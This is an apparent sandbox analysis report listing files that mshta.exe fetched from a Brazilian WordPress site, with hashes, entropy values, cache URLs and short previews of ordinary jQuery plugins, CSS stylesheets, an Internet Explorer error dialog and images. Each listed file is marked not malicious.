                                        Preview:// ---------------------------------------------------------.// !!!!!!!!!!!!!!!!!document ready!!!!!!!!!!!!!!!!!!!!!!!!!!.// ---------------------------------------------------------.jQuery(document).ready(function(){.// ---------------------------------------------------------.// Blog masonry.// ---------------------------------------------------------..if(jQuery('body.blog')[0]){...var isotope_holder = jQuery('.isotope');...isotope_holder.imagesLoaded( function() {....isotope_holder.isotope({.....itemSelector : '.post_wrapper',.....hiddenClass : 'hidden',.....resizable : true,.....transformsEnabled : false,.....layoutMode: 'masonry'....}).bind("resize.rainbows", function(){.....isotope_holder.isotope('reLayout');....}).trigger("resize.rainbows").css({'visibility':'visible'});...});..}.// ---------------------------------------------------------.// Call Magnific Popup.// ---------------------------------------------------------..jQuery(".thumbnail").parent().each(function(){magnific_p
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:downloaded
                                        Size (bytes):3247
                                        Entropy (8bit):5.459946526910292
                                        Encrypted:false
                                        SSDEEP:96:vKFlZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:C0pv+GkduSDl6LRa
                                        MD5:16AA7C3BEBF9C1B84C9EE07666E3207F
                                        SHA1:BF0AFA2F8066EB7EE98216D70A160A6B58EC4AA1
                                        SHA-256:7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754
                                        SHA-512:245559F757BAB9F3D63FB664AB8F2D51B9369E2B671CF785A6C9FB4723F014F5EC0D60F1F8555D870855CF9EB49F3951D98C62CBDF9E0DC1D28544966D4E70F1
                                        Malicious:false
                                        IE Cache URL:res://ieframe.dll/error.dlg
                                        Preview:...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialog.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonface
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1706
                                        Entropy (8bit):5.274543201400288
                                        Encrypted:false
                                        SSDEEP:48:NIAbzyYh8rRLkRVNaktqavP61GJZoF+SMy:xWqxztqaHO
                                        MD5:B9BEC45642FF7A2588DC6CB4131EA833
                                        SHA1:4D150A53276C9B72457AE35320187A3C45F2F021
                                        SHA-256:B0ABE318200DCDE42E2125DF1F0239AE1EFA648C742DBF9A5B0D3397B903C21D
                                        SHA-512:C119F5625F1FC2BCDB20EE87E51FC73B31F130094947AC728636451C46DCED7B30954A059B24FEF99E1DB434581FD9E830ABCEB30D013404AAC4A7BB1186AD3A
                                        Malicious:false
                                        Preview:...window.onerror = HandleError..function HandleError(message, url, line)..{..var str = L_Dialog_ErrorMessage + "\n\n"..+ L_ErrorNumber_Text + line + "\n"..+ message;..alert (str);..window.close();..return true;..}..function loadBdy()..{..var objOptions = window.dialogArguments;..btnNo.onclick = new Function("btnOKClick()");..btnNo.onkeydown = new Function("SwitchFocus()");..btnYes.onclick = new Function("btnYesClick()");..btnYes.onkeydown = new Function("SwitchFocus()");..document.onkeypress = new Function("docKeypress()");..spnLine.innerText = objOptions.getAttribute("errorLine");..spnCharacter.innerText = objOptions.getAttribute("errorCharacter");..spnError.innerText = objOptions.getAttribute("errorMessage");..spnCode.innerText = objOptions.getAttribute("errorCode");..txaURL.innerText = objOptions.getAttribute("errorUrl");..if (objOptions.errorDebug)..{..divDebug.innerText = L_ContinueScript_Message;..}..btnYes.focus();..}..function SwitchFocus()..{..var HTML_KEY_ARROWLEFT = 37;..
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:PNG image data, 647 x 203, 8-bit/color RGBA, non-interlaced
                                        Category:downloaded
                                        Size (bytes):22332
                                        Entropy (8bit):7.95225542017139
                                        Encrypted:false
                                        SSDEEP:384:uOarYkT57qgE2KHef+OaSjnSuvLYF4Ex+ZdnNqe7rS1:darV5ugE2KzO5bSuvLY6Ex0nZ/S1
                                        MD5:2480CFD093671638A8FB34154B96D47A
                                        SHA1:3F412F18AAAFDEDC7354C60A7B1CE6A5DD5168D3
                                        SHA-256:3B2E707E645AF05594B0E247F77AB992B59767637F9A21A34A826CC16E0250D2
                                        SHA-512:C6FF46FC26E7F934812382F0AAE8BABEC184207F00E4FE696BE92F9548DC3630657B5EFFD87EA284254A8E6A6DCFCCEB93862AD6DB0F6D6647E026346963158D
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/uploads/2018/08/facex_horizontal2-e1535501425981.png
                                        Preview:.PNG........IHDR...............9... .IDATx..y|T...?.;K&.!.$........#K@..nE....e.Vl..........i.....Rk!..\.......(.,!..I.!d..~.?f.If.=w.d&.y..W.=..3K.~.w.$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$...ho V..l..We[@.LJ*......m....3.Dp...Fb4........Cc...\{._.D".H$..Vz.8.{.d....)y._.p.@..9.D....f.01...S...lQ....5`m.D".H$.C.q....T..z..L........b0.dP)..2<.L..... .H$..D..!.wWT.i.....8.......L........<"5.[.H$..D.....H.pUQo%`.@.....Q...P.q9..D{?..D".Hz..J..=y2..T......D{?F... ~.U....*...H$..D.....6....|........f..m...........-...].4.<P....E.. .b..bBo......$.!.w......'.&%....n........~{.ZL".H$..$.]Z.~\qj...#L|.....GN6...z..9.oj..Yc..T6t.ID.....I......NAn.d..{....R.G/.M...J$..D"..tIq..h.`......f...`.j|Yy.......6C2.b...d`_..N:...._...b~(?7s..;.H$..D...R.p..d%N}.....u..f.~q.e.x..).[....L.M..,...........f....$..D".....8.]^.}..#B........Nb..U.Z{...3.+.+.za..,L.(...I.<.;...bv-..0.9...H$..D.].yq..p.0R.gAt....g....l..T.\.F1.j
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with very long lines
                                        Category:downloaded
                                        Size (bytes):5941
                                        Entropy (8bit):5.075074456166432
                                        Encrypted:false
                                        SSDEEP:48:+XXpDjoVAxgD1/g1JlYZYGWUQlfAci14nNSvOFfYuzjwWPQvg8DhHoqK4zORAxFm:KpoVhxSK6UQlf21VOCo8FI74aRO9nblc
                                        MD5:C553A58B7B87830D624BC55C478732AD
                                        SHA1:E53CF7C7030F1CAACFEF4C00E7092340B61ABFC2
                                        SHA-256:013585D07F16D114D3402E3B540854C914254D7F17FD430E216E8DF7334C9C92
                                        SHA-512:8A68FBB8ECEC471BFDA84B524C56085BD8D928A97B0F538E531E2E057A15DA74FEDE3A2F32EEDE437C278778A302B25F4AE3B388E135878C0D2283691B7E3C48
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/FlexSlider/flexslider.css?ver=2.2.0
                                        Preview:/*. * jQuery FlexSlider v2.2.0. * http://www.woothemes.com/flexslider/. *. * Copyright 2012 WooThemes. * Free to use under the GPLv2 license.. * http://www.gnu.org/licenses/gpl-2.0.html. *. * Contributing author: Tyler Smith (@mbmufffin). */.../* Browser Resets.*********************************/..flex-container a:active,..flexslider a:active,..flex-container a:focus,..flexslider a:focus {outline: none;}..slides,..flex-control-nav,..flex-direction-nav {margin: 0; padding: 0; list-style: none;}..flexslider-rtl {direction:rtl; text-align:right;}./* Icon Fonts.*********************************/./* Font-face Icons */.@font-face {..font-family: 'flexslider-icon';..src:url('fonts/flexslider-icon.eot');..src:url('fonts/flexslider-icon.eot?#iefix') format('embedded-opentype'),...url('fonts/flexslider-icon.woff') format('woff'),...url('fonts/flexslider-icon.ttf') format('truetype'),...url('fonts/flexslider-icon.svg#flexslider-icon') format('svg');..font-weight: normal;..font-style: normal;.}../
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with very long lines
                                        Category:downloaded
                                        Size (bytes):1076
                                        Entropy (8bit):5.146194862266352
                                        Encrypted:false
                                        SSDEEP:24:2wFz5dxCwMo9Ip1Axquw14QOdq9aE0VrkV/VDFVHV6VJvV7d9r2lLnsn1Dn:FzVdYgqjOdquS9z1wJtJe7s1D
                                        MD5:FE76A6B329775418FB0EFE5FE8797001
                                        SHA1:6ADF84DEC08BAF40C1CB81BB94610EEBEB630451
                                        SHA-256:7F83A9259FD19BC18D4C3ED17095CBDE1A8974BA1E727F99321454E6F117D4E7
                                        SHA-512:D94D842E4461984D5858CA04B1C7C9B7F3BCDB25F6C8BD551F1CA6825ACC314DEE3E4F5605A97DD79EF92703BF5AB7B8DE9BE91C5802063A311C2945173397CE
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/themes/CherryFramework/js/jflickrfeed.js?ver=1.0
                                        Preview:(function(b){b.fn.jflickrfeed=function(c,e){c=b.extend(!0,{flickrbase:"//api.flickr.com/services/feeds/",feedapi:"photos_public.gne",limit:20,qstrings:{lang:"en-us",format:"json",jsoncallback:"?"},cleanDescription:!0,useTemplate:!0,itemTemplate:"",itemCallback:function(){}},c);var d=c.flickrbase+c.feedapi+"?",f=!0,g;for(g in c.qstrings)f||(d+="&"),d+=g+"="+c.qstrings[g],f=!1;return b(this).each(function(){var g=b(this),f=this;b.getJSON(d,function(d){b.each(d.items,function(d,a){if(d<c.limit){if(c.cleanDescription){var b=./<p>(.*?)<\/p>/g,e=a.description;b.test(e)&&(a.description=e.match(b)[2],void 0!=a.description&&(a.description=a.description.replace("<p>","").replace("</p>","")))}a.image_s=a.media.m.replace("_m","_s");a.image_t=a.media.m.replace("_m","_t");a.image_m=a.media.m.replace("_m","_m");a.image=a.media.m.replace("_m","");a.image_b=a.media.m.replace("_m","_b");delete a.media;if(c.useTemplate){var b=c.itemTemplate,h;for(h in a)b=b.replace(RegExp("{{"+h+"}}","g"),a[h]);g.append(
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with very long lines
                                        Category:downloaded
                                        Size (bytes):7199
                                        Entropy (8bit):5.223786028238701
                                        Encrypted:false
                                        SSDEEP:96:tBySz91Gwyk35YrfBewIt9jKLKDs2SFNK7wIDBRANyCfVJ45NI:zySzvGw/35YbMx9jKLKD3UIDBR8VVUq
                                        MD5:EB05D8D73B5B13D8D84308A4751ECE96
                                        SHA1:743052320809514FB788FE1D3DF37FC87CE90452
                                        SHA-256:1E67D8DBCCA1F6FD94E077C85C2FB40FA1C2756C99238DAA8DA882144260A68D
                                        SHA-512:7B68A43A22A41404A2FF58E0DA6A237492CAD0FC3E56D216980802B4D5FB483895262A7E049340D6670002BDF899BA88C319239E60D0AAE1AC31D98556B0AD6E
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-migrate-1.2.1.min.js?ver=1.2.1
                                        Preview:/*! jQuery Migrate v1.2.1 | (c) 2005, 2013 jQuery Foundation, Inc. and other contributors | jquery.org/license */.jQuery.migrateMute===void 0&&(jQuery.migrateMute=!0),function(e,t,n){function r(n){var r=t.console;i[n]||(i[n]=!0,e.migrateWarnings.push(n),r&&r.warn&&!e.migrateMute&&(r.warn("JQMIGRATE: "+n),e.migrateTrace&&r.trace&&r.trace()))}function a(t,a,i,o){if(Object.defineProperty)try{return Object.defineProperty(t,a,{configurable:!0,enumerable:!0,get:function(){return r(o),i},set:function(e){r(o),i=e}}),n}catch(s){}e._definePropertyBroken=!0,t[a]=i}var i={};e.migrateWarnings=[],!e.migrateMute&&t.console&&t.console.log&&t.console.log("JQMIGRATE: Logging is active"),e.migrateTrace===n&&(e.migrateTrace=!0),e.migrateReset=function(){i={},e.migrateWarnings.length=0},"BackCompat"===document.compatMode&&r("jQuery is not compatible with Quirks Mode");var o=e("<input/>",{size:1}).attr("size")&&e.attrFn,s=e.attr,u=e.attrHooks.value&&e.attrHooks.value.get||function(){return null},c=e.attrHoo
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with very long lines, with no line terminators
                                        Category:downloaded
                                        Size (bytes):17219
                                        Entropy (8bit):5.3136571369702965
                                        Encrypted:false
                                        SSDEEP:384:9Cda0BL3liEPys8C5w+J1HAZ3vePKL3VYb2:YDdys8CuYKZ3vePKL3Wi
                                        MD5:F937C24AEE1A092CB9A337391ACFA645
                                        SHA1:22B537591377B42445B6383F54F6C05D4EBFE39A
                                        SHA-256:B5CF71E5EBD435D68E269558177FD4F444F36B0E8C18F7299F1590E0EE12B146
                                        SHA-512:9F2BE4FD1D3D2CBD2B8E7E4028F540C6CE0FD5889F4CD5BD2DB06076239E400CC07E0DB88319E9C3AAD8973E70CACAC5F69247DC7E09B777ECBF67C3F26FE059
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.mobile.customized.min.js
                                        Preview:window.define=function(){Array.prototype.slice.call(arguments).pop()(window.jQuery)};define(["jquery"],function(a){(function(a,b){if(a.cleanData){var c=a.cleanData;a.cleanData=function(b){for(var d=0,e;(e=b[d])!=null;d++){a(e).triggerHandler("remove")}c(b)}}else{var d=a.fn.remove;a.fn.remove=function(b,c){return this.each(function(){if(!c){if(!b||a.filter(b,[this]).length){a("*",this).add([this]).each(function(){a(this).triggerHandler("remove")})}}return d.call(a(this),b,c)})}}a.widget=function(b,c,d){var e=b.split(".")[0],f;b=b.split(".")[1];f=e+"-"+b;if(!d){d=c;c=a.Widget}a.expr[":"][f]=function(c){return!!a.data(c,b)};a[e]=a[e]||{};a[e][b]=function(a,b){if(arguments.length){this._createWidget(a,b)}};var g=new c;g.options=a.extend(true,{},g.options);a[e][b].prototype=a.extend(true,g,{namespace:e,widgetName:b,widgetEventPrefix:a[e][b].prototype.widgetEventPrefix||b,widgetBaseClass:f},d);a.widget.bridge(b,a[e][b])};a.widget.bridge=function(c,d){a.fn[c]=function(e){var f=typeof e==="str
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:HTML document, ASCII text, with very long lines, with no line terminators
                                        Category:downloaded
                                        Size (bytes):12314
                                        Entropy (8bit):5.301581700967231
                                        Encrypted:false
                                        SSDEEP:192:Eu55THWDn9KHdfJJqbbo5jaSJJJkSeIUHV+2LDDhWwpy8b7z:j5RHWD9KxJJAo5jakrwHVrHh1pz
                                        MD5:8CEF5686125E254FB53C25F16E310525
                                        SHA1:93522E2AB068A3433331E08144722DD57A8FAE9A
                                        SHA-256:6C44371BECA8CB2A76B857B17532BB3512B2E68B4A8678AB4288B95353005A0F
                                        SHA-512:BBA61E0EC78AC07E6EF8D4195D6E17B6276559129749F1B1C836826AB5660CFC5441CB7F979EFDC7D5ED0931EC2AD8C6DC21BAEF83CB19218B107441B2A9E290
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/themes/CherryFramework/js/modernizr.js?ver=2.0.6
                                        Preview:;window.Modernizr=function(a,b,c){function B(a){j.cssText=a}function C(a,b){return B(n.join(a+";")+(b||""))}function D(a,b){return typeof a===b}function E(a,b){return!!~(""+a).indexOf(b)}function F(a,b){for(var d in a){var e=a[d];if(!E(e,"-")&&j[e]!==c)return b=="pfx"?e:!0}return!1}function G(a,b,d){for(var e in a){var f=b[a[e]];if(f!==c)return d===!1?a[e]:D(f,"function")?f.bind(d||b):f}return!1}function H(a,b,c){var d=a.charAt(0).toUpperCase()+a.slice(1),e=(a+" "+p.join(d+" ")+d).split(" ");return D(b,"string")||D(b,"undefined")?F(e,b):(e=(a+" "+q.join(d+" ")+d).split(" "),G(e,b,c))}function I(){e.input=function(c){for(var d=0,e=c.length;d<e;d++)t[c[d]]=c[d]in k;return t.list&&(t.list=!!b.createElement("datalist")&&!!a.HTMLDataListElement),t}("autocomplete autofocus list placeholder max min multiple pattern required step".split(" ")),e.inputtypes=function(a){for(var d=0,e,f,h,i=a.length;d<i;d++)k.setAttribute("type",f=a[d]),e=k.type!=="text",e&&(k.value=l,k.style.cssText="position:abs
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text
                                        Category:downloaded
                                        Size (bytes):5924
                                        Entropy (8bit):5.072069034552564
                                        Encrypted:false
                                        SSDEEP:48:A/ZGnrZNGkS5fS0sGukCMiVG9/WDLqI+TlZ7kKXQmMfdScuFeUK7rqW9dvgOGH6o:oZ0ZQolYC1+kp+5Z7kKXQmGoeUK7+P
                                        MD5:2737F7BF6C359378B907AE244C7C41C3
                                        SHA1:14C848EA1F424CD82CBF1F732BBEB0D50F06169F
                                        SHA-256:2EDF2AA5AAA3ABEDE8968ECCFE9871849205188186D1AE62F14AB3FF4BB8EF6C
                                        SHA-512:994CBEE171BF10EA517579819D6F82C446F10ADFF9DB72EB78771560DC8DB855799D1B9B4E6360EA4E2010965569F46BB371B1E75398FDF5510D2BCC8FC1BC60
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/owl-carousel/owl.carousel.css?ver=1.24
                                        Preview:/* . * .Core Owl Carousel CSS File. *.v1.24. */../* clearfix */..owl-carousel .owl-wrapper:after {..content: ".";..display: block;..clear: both;..visibility: hidden;..line-height: 0;..height: 0;.}./* display none until init */..owl-carousel{..display: none;..position: relative;..width: 100%;..-ms-touch-action: pan-y;.}..owl-carousel .owl-wrapper{..display: none;..position: relative;..-webkit-transform: translate3d(0px, 0px, 0px);.}..owl-carousel .owl-wrapper-outer{..overflow: hidden;..position: relative;..width: 100%;.}..owl-carousel .owl-wrapper-outer.autoHeight{..-webkit-transition: height 500ms ease-in-out;..-moz-transition: height 500ms ease-in-out;..-ms-transition: height 500ms ease-in-out;..-o-transition: height 500ms ease-in-out;..transition: height 500ms ease-in-out;.}....owl-carousel .owl-item{..float: left;.}..owl-controls .owl-page,..owl-controls .owl-buttons div{..cursor: pointer;.}..owl-controls {..-webkit-user-select: none;..-khtml-user-select: none;..-moz-user-select: no
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text
                                        Category:downloaded
                                        Size (bytes):1664
                                        Entropy (8bit):5.223754054665017
                                        Encrypted:false
                                        SSDEEP:24:8rpEA98FvWxsEFgbZl4ulFZlnG1GoRVWX1GaDtGqvWf+KHK2ld1GKZXugZM5+iTk:8PG0+EFgPeAGfBw5JX0kg9
                                        MD5:FE31A99F51A65EC2A31AD4B63702C93D
                                        SHA1:1BA10A799FBD399D03E9AD2C71431C89ABBC4F32
                                        SHA-256:8F8439F41DD768871BDE30FCEB034A6DE5A50945A564658A60A06B23CB5D039A
                                        SHA-512:0346796A91A74B470D6C44536A685D8F8E7C154163A60CF001EC15CDD80A71B43ED270112575E584974F8274FDB4200E2A3EBF92DA8A8F9ACC1438BD3495446F
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/owl-carousel/owl.theme.css?ver=1.24
                                        Preview:/*.* .Owl Carousel Owl Demo Theme .*.v1.24.*/...owl-theme .owl-controls{..margin-top: 10px;..text-align: center;.}../* Styling Next and Prev buttons */...owl-theme .owl-controls .owl-buttons div{..color: #FFF;..display: inline-block;..zoom: 1;..*display: inline;/*IE7 life-saver */..margin: 5px;..padding: 3px 10px;..font-size: 12px;..-webkit-border-radius: 30px;..-moz-border-radius: 30px;..border-radius: 30px;..background: #869791;..filter: Alpha(Opacity=50);/*IE7 fix*/..opacity: 0.5;.}./* Clickable class fix problem with hover on touch devices */./* Use it for non-touch hover action */..owl-theme .owl-controls.clickable .owl-buttons div:hover{..filter: Alpha(Opacity=100);/*IE7 fix*/..opacity: 1;..text-decoration: none;.}../* Styling Pagination*/...owl-theme .owl-controls .owl-page{..display: inline-block;..zoom: 1;..*display: inline;/*IE7 life-saver */.}..owl-theme .owl-controls .owl-page span{..display: block;..width: 12px;..height: 12px;..margin: 5px 7px;..filter: Alpha(Opacity=50);/
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:downloaded
                                        Size (bytes):687
                                        Entropy (8bit):7.458759901857417
                                        Encrypted:false
                                        SSDEEP:12:6v/7m/6T/MxuT6GaUz0uUVijlYa3uTr/xgJawYZnWGLJfcqREdlec:b/67tZaV+YwuPBw0RLrqd8c
                                        MD5:363DA7C647BE7AEFCF5505F4F89DC205
                                        SHA1:469D6084D160034D024AF67B4D61C0EDE98CFBA6
                                        SHA-256:F66C95E006D101DADB1678A583A35F52FBD20C7EB0CB05FF485019DBD0CE1D02
                                        SHA-512:31551E0ED608813FCA4955BB3ECF3311BF096585FAF0BBF8FA04FEDFCAA54D85B1555D314C074645221417B865AF08C1D86F08670454DF12828A1C4DED220209
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/plugins/gtranslate/flags/16/pt-br.png
                                        Preview:.PNG........IHDR................a....pHYs................ cHRM..z%..............u0...`..:....o._.F...5IDATx..KHTa......s.q.F.il*$E.I....iSd..,.ePF;w.....hW......&..%..............F.6...xx.x_!.d'#.Z.~}og,.........V%`:. .(.B.K.......:....-..$.#.(B.&.D...*...T!.....v..2.."....X..<M.....g...&..Nsh...v..U.0m.B.B.*...tt...=....UIwW.....j..$.#UL..@.(.&.p...tE.H.b...X..J...O.;...1.w}.a. ..[.-.E..S4...U.?*2:...ti.z....G)Lu%Cg....9.-.I...dA.r"..|#...udp..J.*_f~1.|....h.2.s...1.Ym.i...5....j.+W.ez&..d...'.~.d.S.&.7...Zcu.`..^.K.*..lgd>..1n]H....-..b$2!|5U|.M.0.8.,t$...k..r...F.u..qy0.B.V..9....6.hI.e%..#e.`pF.@Ws.!1..g...(..f......"...8.%vZ........>)......IEND.B`.
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text
                                        Category:downloaded
                                        Size (bytes):369
                                        Entropy (8bit):4.540020121615135
                                        Encrypted:false
                                        SSDEEP:6:U2LyinnK9NPF3SgcIdRVOlasFoybT4vF3Sg2OjC/ir7Ql3Q8sC:U2Llnn8PF3fnVO4sF1XMF32WiwC
                                        MD5:894A154E267382CF65B478B759115923
                                        SHA1:ECFFCAEAC680371DF912387314F648F2DA111E19
                                        SHA-256:875858A39A88A7E765F15CF95E6B8CCD5D647C5617F7241C8637959ECAA1508C
                                        SHA-512:02F39EB5B6C33DC76C6900644F58D69DAD08BE287409D23BA64963EA6105DF9ECE46128DD5A2731E5675E0DC7CA7ABE9485E8E5CB22ADE6303840ECCB2544FEC
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/themes/theme51253/style.css
                                        Preview:/*--..Theme Name: theme51253..Theme URI: http://info.template-help.com/help/..Description: A theme for Wordpress 4.4.x..Author: Template_Help.com..Author URI: http://info.template-help.com/help/..Template: CherryFramework..Version: 3.1.5.--*/../* ----------------------------------------..Please, You may put custom CSS here.---------------------------------------- */.
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text
                                        Category:downloaded
                                        Size (bytes):1743
                                        Entropy (8bit):5.077735166460529
                                        Encrypted:false
                                        SSDEEP:24:XVrYR0dTwSJ3zdUB4y45bkR/y/CXqprQW0Lp4FqjNrrKsTwRX5xIWJoDxVPToVpB:XVrAMLeR6/WqprQWEpfNrnwx5NYVLo/B
                                        MD5:EC96E53E57B5D34F762D567CDB29A312
                                        SHA1:33D59800F24B9967590354A7B47B37000DC5A5CC
                                        SHA-256:A559BA07F12AEDA335CA811BB96B6F57B555815A835FE5F86AD6E7F166190E6D
                                        SHA-512:026480FEB9493F463E9C7EC8E6FCB4F4F7706E71DC4F90EE0E74C30BD5C930535C3D329A20AB241E54E5FCF9A510F43081149449F4983DBC274BD155AE1A2F78
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.3
                                        Preview:div.wpcf7 {..margin: 0;..padding: 0;.}..div.wpcf7 .screen-reader-response {..position: absolute;..overflow: hidden;..clip: rect(1px, 1px, 1px, 1px);..height: 1px;..width: 1px;..margin: 0;..padding: 0;..border: 0;.}..div.wpcf7-response-output {..margin: 2em 0.5em 1em;..padding: 0.2em 1em;..border: 2px solid #ff0000;.}..div.wpcf7-mail-sent-ok {..border: 2px solid #398f14;.}..div.wpcf7-mail-sent-ng,.div.wpcf7-aborted {..border: 2px solid #ff0000;.}..div.wpcf7-spam-blocked {..border: 2px solid #ffa500;.}..div.wpcf7-validation-errors,.div.wpcf7-acceptance-missing {..border: 2px solid #f7e700;.}...wpcf7-form-control-wrap {..position: relative;.}..span.wpcf7-not-valid-tip {..color: #f00;..font-size: 1em;..font-weight: normal;..display: block;.}...use-floating-validation-tip span.wpcf7-not-valid-tip {..position: absolute;..top: 20%;..left: 20%;..z-index: 100;..border: 1px solid #ff0000;..background: #fff;..padding: .2em .8em;.}..span.wpcf7-list-item {..display: inline-block;..margin: 0 0 0 1em
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with very long lines
                                        Category:downloaded
                                        Size (bytes):10231
                                        Entropy (8bit):5.498827185914172
                                        Encrypted:false
                                        SSDEEP:192:dEBsWGAZvwGxP1hNWwI9V0YOOsFbkRHeZtyIVyX8c727LMoOyXoy7NgvZ4xsnyQ/:dAsWGAZvwGxP1hNWwI9V0YO1NkRHezyV
                                        MD5:9FFDBA2CFF497D701684657E329871F5
                                        SHA1:693465E9D9376FD4D2FCD45FFC24F735E1159312
                                        SHA-256:5FC71212D5F80194F946CC9239D030AAE8B51879EC22BD6F9A793C49E543D1C0
                                        SHA-512:5DA070D4040661BD167EF22C6F81C7DC6A9ED79F9CC6C662750B9EB3B1F2048E8D782536996EA7C54E961CD514313314EBFA724409CD2F0440D884288C9ECFFA
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-includes/js/swfobject.js?ver=2.2-20120417
                                        Preview:/*.SWFObject v2.2 <http://code.google.com/p/swfobject/> ..is released under the MIT License <http://www.opensource.org/licenses/mit-license.php> .*/.var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.userAgent.toLowerCase(),Y=t.platform.toLowerCase(),ae=Y?/win/.test(Y):/win/.test(ah),ac=Y?/mac/.test(Y):/mac/.test(ah),af=/webkit/.test(ah)?parseFloat(ah.replace(/^.*webkit\/(\d+(\.\d+)?).*$/,"$1")):false,X=!+"\v1",ag=[0,0,0],ab=null;if(typeof t.plugins!=D&&typeof t.plugins[S]==r){ab=t.plugins[S].description;if(ab&&!(typeof t.mimeTypes!=D&&t.mimeTypes[q]&&!t.mimeTypes[q].enabledPlugin)){T=true;X=false;ab=ab.replace(/^.*\s+(\S+\s+\S+$)/,"$1");ag[0]=par
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with very long lines, with no line terminators
                                        Category:downloaded
                                        Size (bytes):87745
                                        Entropy (8bit):5.5982827947800144
                                        Encrypted:false
                                        SSDEEP:1536:BC7O2E2CzZOUWqTNWm3GJUWXTOhYijX6MAuKT+0/W2sqDYyUliBf21R+ab+gLSnr:q9j+K
                                        MD5:BB3B682DA2B43CE2AB6127EC0BB2F84E
                                        SHA1:B7734D0819DA9A80E1483A36357D06EB24332C25
                                        SHA-256:19BBB78D70DD6EE89FF91E26A422ADB69510E8FF83ACE800AD7E5D0F35F14509
                                        SHA-512:81E0791DFF8996258C773DAC76EECC3C3B40658B16F7A57E224139A0B65E7EDDFA5D5DF64DE010034823BF642270C968FDB3FE38D99FF7BAB1C19ED1751DF5E3
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/plugins/motopress-content-editor/includes/css/theme.css?ver=1.5.8
                                        Preview:.motopress-text-obj span{line-height:1em}.motopress-image-obj .motopress-image-obj-basic{max-width:100% !important;margin:0 !important;padding:0 !important;border:0}.motopress-image-slider-obj{line-height:normal;min-height:0}.motopress-image-slider-obj *{line-height:normal}.motopress-image-slider-obj .slides{list-style:none outside none;margin:0 !important;padding:0;line-height:normal}.motopress-image-slider-obj .slides li{margin:0;margin-left:0 !important;padding:0}.motopress-image-slider-obj .slides li:before,.motopress-image-slider-obj .slides li:after{content:none !important}.motopress-image-slider-obj .slides li img{margin:0;padding:0;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none;border:0}.motopress-image-slider-obj .flex-control-nav{position:absolute !important;list-style:none outside none !important;margin:0 !important;padding:0 !important;line-height:normal;right:auto !important;bottom:-40px !important;text-align:center !important;z-index:auto !important}.motopre
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:GIF image data, version 89a, 36 x 38
                                        Category:dropped
                                        Size (bytes):1062
                                        Entropy (8bit):4.517838839626174
                                        Encrypted:false
